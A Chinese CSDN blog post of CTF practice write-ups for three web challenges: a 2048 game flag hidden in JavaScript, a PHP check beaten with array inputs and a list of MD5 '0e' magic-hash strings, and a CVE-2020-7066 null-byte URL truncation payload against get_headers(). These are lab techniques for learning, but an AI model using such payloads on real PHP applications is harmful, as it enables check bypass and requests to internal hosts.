CTF题目练习-3day

已于 2023-05-28 17:05:56 修改
阅读量511 收藏
点赞数
分类专栏: CTF题目笔记 文章标签: 数学建模 php 开发语言
于 2023-05-28 17:05:39 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZhangAweio/article/details/130914132
版权

平台

主页 | NSSCTF

题目:

WEb

[HNCTF 2022 Week1]2048

炸一看,就是个前端的题目,

还让我达到2000分,做梦去吧,作为一个黑客,怎么能不修改源代码呢??

看到一串玩意,不知道是不是我们想要的,丢进控制台

就这呀???

flag{53160c888e25c3f828b23e316a7ae083}

 [NSSCTF 2022 Spring Recruit]babyphp

源代码:

<?php
highlight_file(__FILE__);
include_once('flag.php');
if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a'])){
    if(isset($_POST['b1'])&&$_POST['b2']){
        if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2'])){
            if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2'])){
                echo $flag;
            }else{
                echo "yee";
            }
        }else{
            echo "nop";
        }
    }else{
        echo "go on";
    }
}else{
    echo "let's get some php";
}
?>

这边可以看到第一层:

if(isset($_POST['a'])&&!preg_match('/[0-9]/',$_POST['a'])&&intval($_POST['a']))

可以看到有preg_match()可以考虑使用数组绕过

a[]=6

再看第二层:

if(isset($_POST['b1'])&&$_POST['b2'])
 if($_POST['b1']!=$_POST['b2']&&md5($_POST['b1'])===md5($_POST['b2']))

传入两个post b1、b2并且 b1 不等于 b2 ,md5的b1等于b2,

这里也可用md5数值绕过

b1[]=1&b2[]=2

最后一层:

if($_POST['c1']!=$_POST['c2']&&is_string($_POST['c1'])&&is_string($_POST['c2'])&&md5($_POST['c1'])==md5($_POST['c2']))

这里多了一个 is_string 函数意思就是说必须为字符串,那么我们就不能用数组绕过了,我们可以考虑md5的碰撞

MD5加密后为0e开头的数字的字符串有:QNKCDZO,s878926199a。
s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708 
0e462097431906509019562988736854
314282422 
0e990995504821699494520356953734
571579406 
0e972379832854295224118025748221
903251147 
0e174510503823932942361353209384
1110242161 
0e435874558488625891324861198103
1320830526 
0e912095958985483346995414060832
1586264293 
0e622743671155995737639662718498
2302756269 
0e250566888497473798724426794462
2427435592 
0e067696952328669732475498472343
2653531602 
0e877487522341544758028810610885
3293867441 
0e471001201303602543921144570260
3295421201 
0e703870333002232681239618856220
3465814713 
0e258631645650999664521705537122
3524854780 
0e507419062489887827087815735195
3908336290 
0e807624498959190415881248245271
4011627063 
0e485805687034439905938362701775
4775635065 
0e998212089946640967599450361168
4790555361 
0e643442214660994430134492464512
5432453531 
0e512318699085881630861890526097
5579679820 
0e877622011730221803461740184915
5585393579 
0e664357355382305805992765337023
6376552501 
0e165886706997482187870215578015
7124129977 
0e500007361044747804682122060876
7197546197 
0e915188576072469101457315675502
7656486157 
0e451569119711843337267091732412
QLTHNDT 
0e405967825401955372549139051580
QNKCDZO 
0e830400451993494058024219903391
EEIZDOI 
0e782601363539291779881938479162
TUFEPMC 
0e839407194569345277863905212547
UTIPEZQ 
0e382098788231234954670291303879
UYXFLOI 
0e552539585246568817348686838809
IHKFRNS 
0e256160682445802696926137988570
PJNPDWY 
0e291529052894702774557631701704
ABJIHVY 
0e755264355178451322893275696586
DQWRASX 
0e742373665639232907775599582643
DYAXWCA 
0e424759758842488633464374063001
GEGHBXL 
0e248776895502908863709684713578
GGHMVOE 
0e362766013028313274586933780773
GZECLQZ 
0e537612333747236407713628225676
NWWKITQ 
0e763082070976038347657360817689
NOOPCJF 
0e818888003657176127862245791911
MAUXXQC 
0e478478466848439040434801845361
MMHUWUV 
0e701732711630150438129209816536

随便一个可以构造最后的payload:

a[]=9&b1[]=1&b2[]=2&c1=QNKCDZO&c2=s878926199a

NSSCTF{02360087-facb-4151-9660-4f317eb27d7e}

 [GKCTF 2020]CVE版签到

首先看到的题目,应该是一个 CVE 具体是啥,我也没见过,我去翻翻资料

cve-2020-7066: 在低于7.2.29的PHP版本7.2.x

原来是这个:将get_headers()与用户提供的URL一起使用时,如果URL包含零(\ 0)字符,则URL将被静默地截断。这可能会导致某些软件对get_headers()的目标做出错误的假设,并可能将某些信息发送到错误的服务器。

构造第一个payload :

url=http://127.0.0.1%00www.ctfhub.com

 后面必须为 123

url=http://127.0.0.123%00www.ctfhub.com

得到flag

Corrot_Pig
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
小程序游戏2048
07-03
小程序游戏2048小程序游戏2048小程序游戏2048小程序游戏2048
CTF(一)
Hack
11-18 6648
    进入夺旗页面,发现是一个js编写的2048游戏,但是感觉不是玩2048这么简单, 查看源码 &lt;!doctype html&gt; &lt;html lang="en"&gt; &lt;head&gt; &lt;meta charset="UTF-8"&gt; &lt;title&gt;
ctfshow 摆烂杯
zip471642048的博客
12-27 1374
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
【无标题】
qq_17720023的博客
05-28 1870
CTF练习题WriteUp之WEB-2048 文章目录CTF练习题WriteUp之WEB-2048 打开URL进去后是2048小游戏 提示得到4096的方块即可获得flag哦 先查看一下源代码 这是一个JS写的游戏 查看一下JS源码 进去以后发现是乱码,用set character encoding插件,即可显示正常 可以直接看到flag ...
青少年CTF-WEB-2048
m0_73734159的博客
11-19 1272
String.fromCharCode将Unicode 编码转换成字符串形式。一、有参数改参数的数值达到题目规定的分数即可拿到flag。这道题并没有说题目通关即可获得flag,也并没有发现参数。二、没有参数那么flag就是被编码了,找编码即可。所以这里猜测flag被编码了,就在源代码里面。alert是JavaScript的弹窗方法。针对这种游戏通关类题目,常见的有两种情况。使用script标签将其作为JS代码执行。查看2048.js文件内容。
ctf-all-in-one
最新发布
01-30
ctf-all-in-one
CTF 逆向练习-Transform
06-10
该资源配合博客使用,博客我还没写。 有空我会在哔哩哔哩录制教程。
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
CTF100题目-安全考题竞赛
04-26
在解题模式CTF赛制中,参赛队伍可以通过互联网或者现场网络参与,这种模式的CTF竞赛与ACM编程竞赛、信息学奥赛比较类似,以解决网络安全技术挑战题目的分值和时间来排名,通常用于在线选拔赛。题目主要包含逆向、...
CTF-Tools-v1.3.7.zip
01-29
CTF常用工具集
HNCTF——web方向部分题解
m0_60715541的博客
11-01 1528
这是这次分享的题解的清单,主要是web的,等我啥时候有时间更新一波杂项的题解。
2048青少年CTFweb
weixin_73452725的博客
10-23 487
我们能看到有一个JS代码组成的2048也就是JavaScript然后查看这个2048.js。找到这个运行的JavaScript复制找到工具js在线运行工具。这个题目我们能看到需要倍数达到2048。打开神器F12查看源码。
NSSCTF 2048
weixin_74336671的博客
01-08 440
修改score>20000或者直接运行:(控制台输入)按F12查看网络,看到2048.js文件,打开。这道题本身就是一个好玩的游戏,哈哈!
[青少年CTF]CheckMe06-07|PingMe02|2048|简简单单的题目|BASE
明裕学长的博客
03-17 1613
得到提示flag2的压缩包密码为二维码解开后在开头加上qsn即可拿到flag压缩包。在结合Free_File_Camouflage工具解开图片中的2.txt。之后对key.txt解密是盲文得到qsnCTF9999。将它复制到js在线运行一下弹窗获得flag。二维码在ps中按ctrl+i黑白反转。将中括号去掉然后结合python。第一个解出密码为qsnctf。另一张改高度得到 我沉醉了。使用字典对登录界面爆破。该题使用万能密码即可。按照里面的提示去解密。
CTF中Web题目的各种基础的思路-----入门篇十分的详细
热门推荐
m0_64815693的博客
09-13 2万+
想学习CTF-web这里给你一个思路,给你一个方向
HNCTF 2022 week1 web方向题解
m0_74160536的博客
08-01 712
简单说一下file伪协议,也是引用的别人博客(https://blog.csdn.net/qq_37466661/article/details/126203437)但正常情况下,我们输入php?filter=flag.php,只会发现一片空白,这时就需要用到php伪协议了,而这道题使用的就是file伪协议。检查-网络-刷新网页,只有两个网络响应,不过另一个是图标,不用管,打开cookie,提示去/f14g.php,跳转。打开环境,是一个小游戏,目标是2000分,不用管,小游戏题基本都是找js代码。
ctf题目复盘
萍水间人的小天地
04-07 3103
为了准备四月下旬的校赛, 豁出去了 2048 首先进去之后是这样一个界面 2048是我喜欢的一个游戏, 然后我女朋友把它玩到了2048, 却啥也没出现。。 网站做的很流畅, 但是我一点思路都没有 开始抓包 GTE请求 发现了一个ETag的东西, 怎么把其下载下来呢? response响应 怎么把它下载下来呢? ... 扫描后...
python反编译-以2048小游戏为例
Henrik-Yao的博客
03-01 2223
背景 一道ctf题,通过破解2048游戏获得flag 游戏的规则很简单,需要控制所有方块向同一个方向运动,两个相同数字方块撞在一起之后合并成为他们的和,每次操作之后会随机生成一个2或者4,最终得到一个“2048”的方块就算胜利了。 工具准备 1.pyinstxtractor.py脚本用于反编译python 脚本内容如下 from __future__ import print_function import os import struct import marshal import zlib
某信息安全攻防大赛周周练考核(二) Writeup By 2ha0yuk7on
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
12-01 1454
某信息安全攻防大赛周周练考核(二) Writeup By 2ha0yuk7on
2019 CTF题目下载及Write-up解析
CTF题目下载及write up(难度较大)-b64_c3VuJTIwYm95-it720.docx 本文档主要是关于CTF安全大赛的题目下载和write up,涵盖了多个题目和解题步骤。 **CTF安全大赛** CTF(Capture The Flag)是指在网络安全领域中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值